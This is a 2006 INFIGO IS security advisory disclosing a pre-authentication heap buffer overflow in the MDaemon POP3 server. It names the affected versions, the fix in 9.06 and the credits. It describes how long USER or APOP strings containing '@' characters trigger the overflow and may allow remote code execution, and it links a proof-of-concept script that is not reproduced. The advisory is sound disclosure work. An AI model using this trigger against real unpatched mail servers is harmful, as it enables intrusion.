INFIGO IS Security Advisory #ADV-2006-08-04 http://www.infigo.hr/ Title: MDaemon POP3 server remote buffer overflow (preauth) Advisory ID: INFIGO-2006-08-04 Date: 2006-08-21 Advisory URL: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04 Impact: Remote code execution (preauth) Risk Level: High Vulnerability Type: Remote Vendors Status: Vendor contacted on 4th May 2006 ==[ Overview MDaemon Server is a standards-based SMTP/POP/IMAP mail server that offers a full range of mail server functionality. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam filters, extensive security features, and more. MDaemon can be found on http://www.altn.com/. ==[ Vulnerability During an audit, a critical vulnerability has been discovered in the MDaemon POP3 server. There is a buffer overflow vulnerability in 'USER' and 'APOP' command processing part of the Altn MDaemon POP3 server. The vulnerability can be triggered with providing a long string to USER or APOP commands with '@' characters included in the string. In this case, MDaemon will incorectly process the string and a heap overflow will happen as a result. To trigger the vulnerability, a few USER commands have to be sent to the POP3 Server. Sometimes (depending on the heap state and string length), it is even possible to redirect code execution directly to the supplied input buffer on the heap. ==[ Affected Version The vulnerability has been identified in the latest MDaemon 8/9. All previous versions are believed to be vulnerable as well. ==[ Fix Vulnerability is fixed in MDaemon 9.06 ==[ PoC Exploit MDaemon POP3 server remote buffer overflow (preauth) PoC can be downloaded from http://www.infigo.hr/files/mdaemon_poc.pl . ==[ Credits Vulnerability discovered by Sasa Jusic and Leon Juranic ==[ INFIGO IS Security Contact INFIGO IS, WWW : http://www.infigo.hr E-mail : infocus@infigo.hr